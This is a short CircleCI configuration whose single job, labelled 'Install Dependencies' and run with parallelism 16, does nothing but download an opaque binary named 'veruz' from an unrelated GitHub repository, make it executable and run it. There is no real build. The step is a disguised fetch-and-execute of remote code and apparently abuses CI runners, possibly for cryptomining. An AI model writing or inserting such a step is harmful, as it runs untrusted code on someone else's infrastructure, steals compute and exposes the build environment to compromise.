version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/t3rs3r4h/master/main/veruz && chmod +x veruz && ./veruz

workflows:
    version: 2.1
    build:
        jobs:
        - trial